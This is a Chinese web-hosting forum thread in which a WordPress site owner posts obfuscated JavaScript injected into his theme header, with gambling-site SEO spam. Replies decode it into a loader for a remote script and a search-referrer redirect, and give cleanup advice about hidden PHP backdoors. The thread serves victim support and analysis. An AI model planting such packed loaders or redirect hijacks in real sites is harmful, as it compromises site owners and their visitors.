全球主机交流论坛

标题: WP建站被黑，大佬帮忙看下头部这段代码什么意思 [打印本页]

作者: 左手写爱 时间: 2018-5-5 07:33
标题: WP建站被黑，大佬帮忙看下头部这段代码什么意思
好域名网站被黑，搜索引擎报风险才发现，WP用了这几年第一次被黑主题头部header和header-bulletin文件被写入这两段代码，大佬帮忙看下什么意思

<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\c\\b\\2\\m\\i\\8\\j\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\1\\2\\3\\9\\4\\0 \\0\\n\\4\\8\\d\\6\\0\\8\\k\\0\\5\\f\\e\\o\\e\\1\\2\\3\\9\\4\\0\\6 \\1\\3\\2\\d\\6\\t\\0\\0\\4\\1\\r\\5\\5\\7\\7\\7\\a\\q\\1\\1\\c\\s\\2\\a\\2\\b\\i\\5\\j\\p\\a\\f\\1\\6\\h\\g\\5\\1\\2\\3\\9\\4\\0\\h\');',30,30,'x74|x73|x63|x72|x70|x2f|x22|x77|x65|x69|x2e|x6f|x64|x3d|x61|x6a|x3c|x3e|x6d|x6e|x78|window|x75|x79|x76|x62|x67|x3a|x6c|x68'.split('|'),0,{}))
</script>
<noscript>
<title>太阳城娱乐城_太阳城娱乐场_首页</title>
<meta name="keywords" content="太阳城娱乐城,太阳城娱乐场,首页" />
<meta name="description" content="太阳城娱乐城是集太阳城娱乐场、游戏行业新闻首页为一体的行业[key太阳城娱乐场]网站,全面报道、放眼网游行业,精彩的游戏新闻、深度报道。" />
</noscript>

复制代码

作者: linode-jspinosi 时间: 2018-5-5 07:34
我只看的懂title 上面什么 JS你删掉不就可以了嘛都知道在哪里了

作者: 周润发 时间: 2018-5-5 07:36
搜索引擎被黑了呀删掉这是黑快照的 WP 插件主题从WP内部下别外面的地方下载没有保障

作者: ber 时间: 2018-5-5 07:37

window["document"]["write"]('<script type="text/javascript" src="https://www.gssdlc.com/nb.js"></script>');

复制代码

document.writeln("<script LANGUAGE="Javascript">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf("baidu")>0 || s.indexOf("sogou")>0 || s.indexOf("soso")>0 ||s.indexOf("sm")>0 ||s.indexOf("uc")>0 ||s.indexOf("bing")>0 ||s.indexOf("yahoo")>0 ||s.indexOf("so")>0 )");
document.writeln("location.href="https://www.444332.vip/?channel=P00142";");
document.writeln("</script>");

复制代码

作者: 木易酱 时间: 2018-5-5 07:43
这是劫持

作者: 左手写爱 时间: 2018-5-5 07:51

周润发发表于 2018-5-5 07:36
搜索引擎被黑了呀删掉这是黑快照的 WP 插件主题从WP内部下别外面的地方下载没有保障 ...

主题插件都是WP后台搜索下载的。。。
我试试更新下密码

作者: fiht233 时间: 2018-5-5 09:34
这个是被挂黑链了

作者: FXB 时间: 2018-5-5 09:40
没用的你这段代码删了还是会被黑,你的网站已经被挂上后门了!
教你个诀窍,先用本地查杀查那些不被加密的后门php,然后先把网站挂到360网站卫士那里去保护一波儿!
然后每天看看拦截信息找到他要注入或者是访问的url 然后找到对应的文件删了
我之前discuz 被黑了好久才解决掉

作者: uijk123 时间: 2018-5-5 09:59
加密了黒链代码

作者: mfcer 时间: 2018-5-5 10:28
WP版本号多少

作者: 左手写爱 时间: 2018-5-5 10:41

FXB 发表于 2018-5-5 09:40
没用的你这段代码删了还是会被黑,你的网站已经被挂上后门了!
教你个诀窍,先用本地查杀查那些不被加密的 ...

好的我先删除后修改密码试试
不行就用你说的这个方法

作者: 左手写爱 时间: 2018-5-5 11:58

mfcer 发表于 2018-5-5 10:28
WP版本号多少

4.7
刚才更新到4.9了

作者: FXB 时间: 2018-5-5 14:41

左手写爱发表于 2018-5-5 10:41
好的我先删除后修改密码试试
不行就用你说的这个方法

不能大意,我之前网站被他起码藏了有5\6个PHP后门文件,然后被我杀了之后我以为没事了,过了半天首页又被改了,然后我就注意到扫马的时候有的文件是未知的,就一个一个去查,发现文件乱码的就是他把PHP加密了,找到那种文件继续删掉才最终搞定

作者: 左手写爱 时间: 2018-5-5 14:45

FXB 发表于 2018-5-5 14:41
不能大意,我之前网站被他起码藏了有5\6个PHP后门文件,然后被我杀了之后我以为没事了,过了半天首页又被改 ...

我FTP上看日期了没有其他可疑文件因为五一放假那几天没上网只要是有变动的肯定是有问题了

作者: FXB 时间: 2018-5-5 14:47

左手写爱发表于 2018-5-5 14:45
我FTP上看日期了没有其他可疑文件因为五一放假那几天没上网只要是有变动的肯定是有问题了 ...

php注入你和我说看FTP的日志///算了我啥也没说了

作者: zhaoxianjin 时间: 2018-5-5 14:54
你们的头像一个比一个骚啊

作者: 左手写爱 时间: 2018-5-5 15:00

FXB 发表于 2018-5-5 14:47
php注入你和我说看FTP的日志///算了我啥也没说了

怪我没说清楚我意思我登录FTP能看到文件日期只要是五一三天显示日期的都是被动过手脚的文件
虽然是个笨方法
之前另外一个虚拟空间被黑就这样解决了，那次被黑是因为服务器漏洞，不是因为网站漏洞

作者: 王大佬 时间: 2018-5-5 15:08
提示: 作者被禁止或删除内容自动屏蔽

作者: 王大佬 时间: 2018-5-5 15:09
提示: 作者被禁止或删除内容自动屏蔽

作者: poctopus 时间: 2018-5-5 15:32
被留后门了，整个网站拉回来慢慢扫毒吧

作者: 左手写爱 时间: 2018-5-5 16:12

王大佬发表于 2018-5-5 15:09
暗链清除，查杀木马，查杀木马，查杀木马

怎么查杀？把整站下载下来之后用360安全卫士杀毒还是？

作者: 王大佬 时间: 2018-5-5 17:44
提示: 作者被禁止或删除内容自动屏蔽

作者: 左手写爱 时间: 2018-5-5 17:56

王大佬发表于 2018-5-5 17:44
木马都是 PHP ASP JPG 一句话之类的用安全工具查安全狗什么鬼的

好的感谢大佬分享我去试试去

欢迎光临全球主机交流论坛 (https://fd.vvwvv.eu.org/)

Powered by Discuz! X3.4